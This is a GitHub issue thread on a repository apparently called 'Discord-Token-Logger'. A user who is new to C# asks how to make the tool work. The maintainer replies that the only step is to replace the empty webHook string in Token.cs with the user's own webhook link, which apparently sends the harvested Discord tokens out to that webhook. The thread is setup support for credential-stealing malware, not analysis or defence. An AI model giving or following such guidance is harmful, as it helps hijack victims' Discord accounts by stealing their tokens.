### ISSUE TITLE
I am Pepega

### ISSUE THREAD

**Issue by N4N001** [ihaai/Discord-Token-Logger#1]
I am having a hard time trying to use this (I am not skilled in C#), could you please explain to me how should I make this work?

**Comment by ihaai** [comment]
You have to change only one single line of the code and that being the following one located at **Token.cs**
This is how it looks in the provided code:
`public readonly string webHook = string.Empty;`
It should look like this:
`public readonly string webHook = "your_webhook_link_goes_here";`

**Comment by N4N001** [comment]
Thank you, I will give you feedback on if this helped me after I will test it.

**Comment by ihaai** [comment]
> 

Alright, let me know if you have any other issues.
